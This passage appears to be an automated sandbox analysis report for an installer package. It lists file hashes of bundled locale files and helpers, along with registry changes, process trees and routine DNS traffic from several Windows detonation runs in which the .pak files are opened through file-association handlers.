| SHA512 | 7b919a5b451ec2ba15d377e4a3a6f99d63268e9be2865d674505584eed4fa190eaae589c9592276b996b7ce2fdfae80fda20feff9ea9adbb586308dfd7f12c2a |
C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\tr.pak
| MD5 | 55e06cd9356d0fb6f99932c2913afc92 |
| SHA1 | aa5c532ddb3f80d2f180ad62ce38351e519a5e45 |
| SHA256 | afcbf02420dc724059f70d1dc6ffa51f5dd75136d9e1e8671d92d5d14955edf9 |
| SHA512 | 813c180cb1aa205034497be5fc8a631ff117e5ed17cdf0ac59b7569d74d849b385852a15bbadd3146f942c58bab80d94bf0980d13ca4b4424d1cb1df0cb1a2cd |
C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\ur.pak
| MD5 | 861ffd74ae5b392d578b3f3004c94ce3 |
| SHA1 | 8a4a05317a0f11d9d216b3e53e58475c301d7ea5 |
| SHA256 | b9f22a23368bf1e21f3085583ecb775cce8045176721ff6ae798b06bd2810dbc |
| SHA512 | 52ede35b7ed1fb6e51b18e450b95c3245d326f2afda646e3642ee68b714dcf9a726afe32e2759e9ea87a104f4a59e6fc2c60b3275aad8332ae1c626231e6747b |
C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\uk.pak
| MD5 | 381cb33c2d4fd0225c5c14447e6a84e0 |
| SHA1 | 686b888228f6dd95ade94fee62eb1d75f3e0fc93 |
| SHA256 | c2a6b16abeab6e18276bc1636555e93218763b9c99cacd0b42481b35e3a11820 |
| SHA512 | f7a2828aa4cd85f07a5d66832f247f70951abf34f81a282dc41ec51875ba70d940353d010b605c56cc59bee47309aa311099d4e6ebd17f3c1538521d0cddf4b6 |
C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\zh-CN.pak
| MD5 | 3210460a24f2e2a2edd15d6f43abbe5f |
| SHA1 | 608ff156286708ed94b7ae90c73568d6042e2dbd |
| SHA256 | 0f8d42d7f0b0b01aafad6ae79f0bd0ca518b2db94287b09df088bc093f15f605 |
| SHA512 | f97427dba4217e01a7ed395c453d03dda4f2258cba589258da0eacfde427bf442cddef541a23e7782914433e70a9623e904a5070deba9f9d50dda20732eb5e86 |
C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\vi.pak
| MD5 | 4076d3c0c0e5f31cf883198c980d1727 |
| SHA1 | db51b746216ea68803c98d7c1a5a2b45944359f3 |
| SHA256 | f1458c4ce4ca708e849eb0c68a5157360ef003f3a9c95628d5ca12ada303b379 |
| SHA512 | 80e4e960218f7d84423124c34352251411baf008e821a344a0b6c2e7f1483694010f28b7de21c7e2c69abb4ec92e0d9cbddeed6279b90c47245f4cbc500cdb77 |
C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\locales\zh-TW.pak
| MD5 | f466116c7ce4962fe674383d543c87f6 |
| SHA1 | f65bf0dc1f1b15c132674fb8ff540f7d2afe1d6e |
| SHA256 | ff3a294fd1afb1fa7aaf53fbc4396643a12ed132633c5c86f14c16b88fa94a7b |
| SHA512 | 4851a08069fcac75e4051e53d4526789bfe6c393ab963e8263803bbf6e96cb150e9ba741650efb5ee500e8a757d8512eb17dc268cec1ab6fd3acfac62f7da27d |
C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\resources\elevate.exe
| MD5 | 792b92c8ad13c46f27c7ced0810694df |
| SHA1 | d8d449b92de20a57df722df46435ba4553ecc802 |
| SHA256 | 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37 |
| SHA512 | 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40 |
\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\StdUtils.dll
| MD5 | c6a6e03f77c313b267498515488c5740 |
| SHA1 | 3d49fc2784b9450962ed6b82b46e9c3c957d7c15 |
| SHA256 | b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e |
| SHA512 | 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803 |
Analysis: behavioral13
Detonation Overview
Submitted
2024-06-13 00:12
Reported
2024-06-13 00:18
Platform
win7-20231129-en
Max time kernel
117s
Max time network
125s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\pak_auto_file | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\pak_auto_file\ | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\.pak\ = "pak_auto_file" | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\pak_auto_file\shell\Read\command | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\pak_auto_file\shell\Read | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\pak_auto_file\shell | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\pak_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\.pak | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1044 wrote to memory of 3056 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 1044 wrote to memory of 3056 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 1044 wrote to memory of 3056 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 3056 wrote to memory of 2704 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 3056 wrote to memory of 2704 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 3056 wrote to memory of 2704 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 3056 wrote to memory of 2704 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\locales\pt-PT.pak
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\locales\pt-PT.pak
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\locales\pt-PT.pak"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | ad9da2057b649935b95bf69dc244ad98 |
| SHA1 | c5c6ba286cfed3c95c1f3ceb7eda48af369be319 |
| SHA256 | 13158d4da1cfaa81a19522ef4fb57df0d93f6f27bbfce98166e88cfb7738bb11 |
| SHA512 | 78ce009c37d8a324353e8da010d7c5c555c4b4d66b3c3db460f2710f230c2224b1fe17dd7d2402f217abc19c6791740d2742e5a2e0ed8f023c00d5ad2f70ecd0 |
Analysis: behavioral14
Detonation Overview
Submitted
2024-06-13 00:12
Reported
2024-06-13 00:19
Platform
win10v2004-20240508-en
Max time kernel
48s
Max time network
58s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\locales\pt-PT.pak
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
Files
Analysis: behavioral20
Detonation Overview
Submitted
2024-06-13 00:12
Reported
2024-06-13 00:19
Platform
win10v2004-20240226-en
Max time kernel
148s
Max time network
175s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\locales\sk.pak
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4088 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 13.107.253.67:443 | tcp | |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.179.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 172.217.169.74:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 74.169.217.172.in-addr.arpa | udp |
Files
Analysis: behavioral26
Detonation Overview
Submitted
2024-06-13 00:12
Reported
2024-06-13 00:18
Platform
win10v2004-20240508-en
Max time kernel
141s
Max time network
158s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\locales\sv.pak
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-06-13 00:12
Reported
2024-06-13 00:18
Platform
win10v2004-20240508-en
Max time kernel
146s
Max time network
154s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\app-64.7z
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3704,i,14221647728265121051,6840906015709541562,262144 --variations-seed-version --mojo-platform-channel-handle=3748 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral22
Detonation Overview
Submitted
2024-06-13 00:12
Reported
2024-06-13 00:18
Platform
win10v2004-20240508-en
Max time kernel
48s
Max time network
62s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\locales\sl.pak
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral25
Detonation Overview
Submitted
2024-06-13 00:12
Reported
2024-06-13 00:18
Platform
win7-20240419-en
Max time kernel
118s
Max time network
127s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\pak_auto_file\shell\Read\command | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\pak_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\pak_auto_file | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\pak_auto_file\ | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\.pak | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\.pak\ = "pak_auto_file" | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\pak_auto_file\shell\Read | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000_CLASSES\pak_auto_file\shell | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1736 wrote to memory of 2668 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 1736 wrote to memory of 2668 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 1736 wrote to memory of 2668 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2668 wrote to memory of 2692 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2668 wrote to memory of 2692 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2668 wrote to memory of 2692 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2668 wrote to memory of 2692 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\locales\sv.pak
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\locales\sv.pak
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\locales\sv.pak"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 2b7ab12bd3b8be3a91cfc102b954f0fb |
| SHA1 | bf50b8132b7b2971a4dc2855a50215e896ff8f0d |
| SHA256 | 7a967a6c1763fe5151f442c9180bc714c64d3b6a936a0f8e0f746fda435da260 |
| SHA512 | 447abe3467f293859fabd0575ea7452bb01d110482453ffc0ad65706bd25991c53a1fdfc4871be80cfe9c1191e522877a0729a88a7c9ec1f90d535282bf5d926 |
Analysis: behavioral28
Detonation Overview
Submitted
2024-06-13 00:12
Reported
2024-06-13 00:18
Platform
win10v2004-20240611-en
Max time kernel
89s
Max time network
156s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\locales\sw.pak
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
Files
Analysis: behavioral30
Detonation Overview
Submitted
2024-06-13 00:12
Reported
2024-06-13 00:18
Platform
win10v2004-20240508-en
Max time kernel
48s
Max time network
55s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\locales\ta.pak
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral31
Detonation Overview
Submitted
2024-06-13 00:12
Reported
2024-06-13 00:18
Platform
win7-20240611-en
Max time kernel
121s
Max time network
133s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\pak_auto_file | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\pak_auto_file\ | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\.pak | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\.pak\ = "pak_auto_file" | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\pak_auto_file\shell\Read\command | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\pak_auto_file\shell\Read | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\pak_auto_file\shell | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\pak_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1916 wrote to memory of 2732 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 1916 wrote to memory of 2732 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 1916 wrote to memory of 2732 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2732 wrote to memory of 2804 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2732 wrote to memory of 2804 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2732 wrote to memory of 2804 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2732 wrote to memory of 2804 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\locales\te.pak
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\locales\te.pak
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\locales\te.pak"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | dba49ff98d44010b45ce0a56fa9b09c8 |
| SHA1 | c7193a670368618c636cae614629335ff3652bab |
| SHA256 | ad405a00f837e8865d038321c4b61abe5381b827828cd5e16f0157a7e08619e2 |
| SHA512 | 4c5ad83a3e13e55c22cf9dad29742780e5a71aff2c15ccb38a000147deffc861f1cea8369aaff9e068bda66ef1f632d74ee118d4c2bcf08c76c247a851a82d44 |
Analysis: behavioral21
Detonation Overview
Submitted
2024-06-13 00:12
Reported
2024-06-13 00:19
Platform
win7-20240221-en
Max time kernel
121s
Max time network
134s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\pak_auto_file\ | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\.pak | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\.pak\ = "pak_auto_file" | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\pak_auto_file\shell\Read | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\pak_auto_file\shell | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\pak_auto_file\shell\Read\command | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\pak_auto_file | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\pak_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2252 wrote to memory of 2524 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2252 wrote to memory of 2524 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2252 wrote to memory of 2524 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2524 wrote to memory of 2752 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
